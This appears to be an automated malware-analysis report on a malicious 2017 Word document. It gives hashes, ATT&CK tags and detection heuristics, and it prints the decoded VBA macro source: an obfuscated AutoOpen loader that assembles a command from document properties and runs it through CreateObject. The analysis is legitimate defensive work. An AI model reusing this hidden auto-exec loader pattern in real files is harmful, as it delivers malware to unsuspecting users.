Office (OLE) malware analysis — malicious · e5a5b17bf839b91d

MALICIOUS

Office (OLE)

65.5 KB Created: 2017-08-25 18:05:00 Authoring application: Microsoft Office Word First seen: 2017-09-14

MD5: 23595ebb3fa5eedac70f915bf52bec80 SHA-1: dc68681ee1afb18c4e59343ab0a47662d881ab14 SHA-256: e5a5b17bf839b91d1f7fca6d6032d06d9e1c1afe95bfae6c16a7a90aa54153c7

252 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing obfuscated VBA macros. The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates the macro is designed to execute a payload, likely via CreateObject and Shell execution. The ClamAV detection 'Doc.Macro.VBSDownloader-6336817-0' further supports this, suggesting a downloader functionality.

Heuristics 9

ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.

Matched line in script

zVGmHgXkRK = xYXbnCdAkUb + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + xLzvpgnLTc
CreateObject(zMZCKBr).Run$ zVGmHgXkRK + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + WaCAXDx, 0
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

zVGmHgXkRK = xYXbnCdAkUb + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + xLzvpgnLTc
CreateObject(zMZCKBr).Run$ zVGmHgXkRK + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + WaCAXDx, 0
EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub autoopen()
MLHHwAkNz
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6833 bytes
SHA-256: `f04d6f11e02a34a51c83bd14890978d517470356102ae070f04f207c99ee2ceb`
Detection ClamAV: No threats found Obfuscation or payload: likely 111 of 141 identifiers look randomly generated (e.g. 'TawAcUNMGvK') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function rEhhNLmHXe() VdvMbaYSfgN = 5228 Dim zFywaSZbYaw(5228) PhytdTc = "aWCYSBta" ZtFMDMDurS = "mTuEegR" zFywaSZbYaw(4027) = bcmmEVNpW zFywaSZbYaw(1427) = cxbSZvy zFywaSZbYaw(752) = 7648 + 3803 + 1865 / 880 / 7565 - 1760 - 9608 + 7845 + 2391 + 7442 zFywaSZbYaw(4437) = 7023 + 8337 + 4924 + 7953 / 2402 - 5800 - 496 - 531 + 7216 zFywaSZbYaw(2393) = zxtDpVwH zFywaSZbYaw(2140) = 3784 zFywaSZbYaw(4192) = AWFnVmYzffN zFywaSZbYaw(3742) = PfyAUkHHF zFywaSZbYaw(4576) = 5582 + 7490 + 7911 + 4508 / 1213 - 1054 - 368 + 3900 + 6177 + 6797 zFywaSZbYaw(4480) = 5086 + 7058 / 1308 - 1062 - 1664 - 1096 + 9391 + 5818 zFywaSZbYaw(1486) = 2976 + 7959 + 7698 + 3826 / 7721 - 7147 - 6058 + 9463 + 3787 + 6281 For VdvMbaYSfgN = 2164 To 2471 zFywaSZbYaw(VdvMbaYSfgN) = VdvMbaYSfgN Next YxvZmuYUb = zFywaSZbYaw(3941) + zFywaSZbYaw(2106) + zFywaSZbYaw(4800) + zFywaSZbYaw(4192) + zFywaSZbYaw(920) + zFywaSZbYaw(1412) + zFywaSZbYaw(801) + zFywaSZbYaw(5228) End Function Function BAbKYyk() dAUpUPTzcR = 229 Dim ENTXWgeYES(229) RRDxmbhCxDa = "nmAxtmtYWcH" arpdSAkYFwT = "MfZfAsnkyp" MPwvKWxXW = "sfLcZzXetpu" ENTXWgeYES(208) = HuHBwBV ENTXWgeYES(162) = UbezbdkCcdc ENTXWgeYES(149) = hMXNvfdvAk ENTXWgeYES(101) = 8532 + 2243 + 8318 + 3979 / 521 - 5931 - 769 - 2479 + 85 + 2116 ENTXWgeYES(142) = 1408 + 445 + 5128 + 8642 / 3822 / 5878 - 2766 - 9528 - 4291 + 9765 + 6324 + 9085 ENTXWgeYES(133) = YfcGAwS ENTXWgeYES(156) = eYcCtMv ENTXWgeYES(153) = zmrkdHW ENTXWgeYES(120) = GsFRcwesmH ENTXWgeYES(142) = 2583 ENTXWgeYES(185) = TawAcUNMGvK ENTXWgeYES(87) = wFgpTnyGGE ENTXWgeYES(122) = wKAxRLnV ENTXWgeYES(177) = BxthBwe ENTXWgeYES(215) = 4405 + 3631 / 7394 / 5284 - 7559 - 9674 - 5212 + 5457 + 4007 For dAUpUPTzcR = 111 To 98 ENTXWgeYES(dAUpUPTzcR) = dAUpUPTzcR Next yGbBFgUv = ENTXWgeYES(65) + ENTXWgeYES(207) + ENTXWgeYES(133) + ENTXWgeYES(126) + ENTXWgeYES(109) + ENTXWgeYES(114) + ENTXWgeYES(229) End Function Sub autoopen() MLHHwAkNz End Sub Public Function ggTZpTK(aLuuSnwLsD) EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr GnVAckkvP = ActiveDocument.CustomDocumentProperties(aLuuSnwLsD) ggTZpTK = GnVAckkvP EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr End Function Public Function MLHHwAkNz() EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr zMZCKBr = ggTZpTK("gESrSSRs") + ggTZpTK("LtyvZmea") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + ggTZpTK("RZBMxFyx") + ggTZpTK("VtuHNxZE") + ggTZpTK("TySSvMWa") EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr xYXbnCdAkUb = ggTZpTK("skvtMzn") + ggTZpTK("KKrUxLAC") + ggTZpTK("zLcsNBTVBDe") + ggTZpTK("cFXuHkv") + ggTZpTK("ETGSKAhy") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + ggTZpTK("EXSECsGd") zVGmHgXkRK = xYXbnCdAkUb + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + xLzvpgnLTc CreateObject(zMZCKBr).Run$ zVGmHgXkRK + RHruvHxgPu + yESXAmBay + UnAvKwHCPA + pNYBRFDg + DRLWdCBGGck + gBSFdSNYLE + HczKhZfVRr + MmWTfEcb + WHWTNBCE + bdLYPGCDZMv + WaCAXDx, 0 EkDrkgDpL = UzsppxthtX + NBVUtanZd = RetWYCCCtx sZfymRrpMhW = UBFmFtZvVbL + VxEykdHc = WGfXZkUyVH LHvDMtZSg = YEnTbKYch + yYynXWMRRK = KTazuHU bzeYnCzs = kxdVWeUvpVA + PpmVKScPBv = PMUkAUMxw XBhrcbmyfHY = UefdmXRVPnX + eaTfYxv = uCSnxHdr End Function Function cuRdFPhNyy() PAKbXHNs = 3556 Dim PxTBVuL(3556) vpKEtPYnx = ("Agpwpszfg") EZXWyEY = ("XzcpsXC") PXTTnxLxu = ("HdfnbbUaT") PxTBVuL(335) = zvrSEEWS PxTBVuL(3269) = RaBpKdZPb PxTBVuL(671) = 1627 + 5363 + 3169 / 1196 / 5182 - 3235 - 8697 - 4301 + 9446 PxTBVuL(3517) = 3855 + 9279 + 8098 + 9073 / 5136 / 1098 / 4134 - 1390 + 437 PxTBVuL(84) = 9851 + 1502 / 2521 / 7954 / 9675 - 5896 + 2676 + 2760 + 4792 PxTBVuL(988) = xfYTDBk PxTBVuL(3036) = RnYXcAtaHyU PxTBVuL(1971) = 5816 PxTBVuL(3496) = 736 PxTBVuL(1579) = 5903 PxTBVuL(900) = fUnDpVCg PxTBVuL(619) = xYTtTZs PxTBVuL(1396) = SHnLaxdmYK PxTBVuL(746) = tudzsyWC PxTBVuL(2580) = 6763 + 2705 / 127 / 3337 / 8002 - 1171 - 2151 - 3265 + 5714 PxTBVuL(934) = 6051 + 1672 + 8105 / 7566 / 2519 - 2021 - 69 + 9299 + 6548 + 1342 PxTBVuL(1897) = 5845 + 3909 / 8335 / 6919 - 318 - 3782 + 2200 PxTBVuL(2511) = 1510 + 2115 / 5185 - 2731 + 7613 + 4362 + 6558 gMDAUKSD = PxTBVuL(3065) + PxTBVuL(2753) + PxTBVuL(1831) + PxTBVuL(2344) + PxTBVuL(1254) + PxTBVuL(3556) End Function Function zSkudDrk() MZFTydmPbn = 3388 Dim ByRErBgyY(3388) kpkRVBWZAr = ("kpfpafWLbUZ") nnPzVKwCX = ("zuppVFdcxW") ByRErBgyY(2605) = euPyaVfXnbw ByRErBgyY(2591) = tpKZUvbMF ByRErBgyY(2467) = 9392 + 4172 + 2010 / 9155 - 434 + 8916 + 715 + 5617 ByRErBgyY(2912) = TWmucUPFT ByRErBgyY(2370) = kYZyAVkrN ByRErBgyY(1740) = sYpgVRZ ByRErBgyY(130) = ZKfaSzhSFL ByRErBgyY(3242) = 5817 ByRErBgyY(1984) = 3964 ByRErBgyY(2402) = 4316 ByRErBgyY(2329) = RWvkKgxyZcg ByRErBgyY(750) = rPYFKMEtcS ByRErBgyY(478) = bzAHXngf ByRErBgyY(3195) = 1810 + 4173 + 5448 + 9085 / 9960 / 4120 / 1970 - 7155 + 4148 + 827 + 9461 ByRErBgyY(2534) = 9447 + 2277 / 2442 - 4398 - 3399 + 4688 + 4156 UfSyUNwcsTK = ByRErBgyY(1830) + ByRErBgyY(1978) + ByRErBgyY(782) + ByRErBgyY(191) + ByRErBgyY(1846) + ByRErBgyY(1149) + ByRErBgyY(3388) GKktyztM = ByRErBgyY(1145) + ByRErBgyY(3152) + ByRErBgyY(2159) + ByRErBgyY(1981) + ByRErBgyY(3388) EBdPfNk = ByRErBgyY(366) + ByRErBgyY(2102) + ByRErBgyY(203) + ByRErBgyY(1027) + ByRErBgyY(2676) + ByRErBgyY(2592) + ByRErBgyY(1554) + ByRErBgyY(3388) End Function

Open this report in the interactive analyzer, or submit your own file for analysis.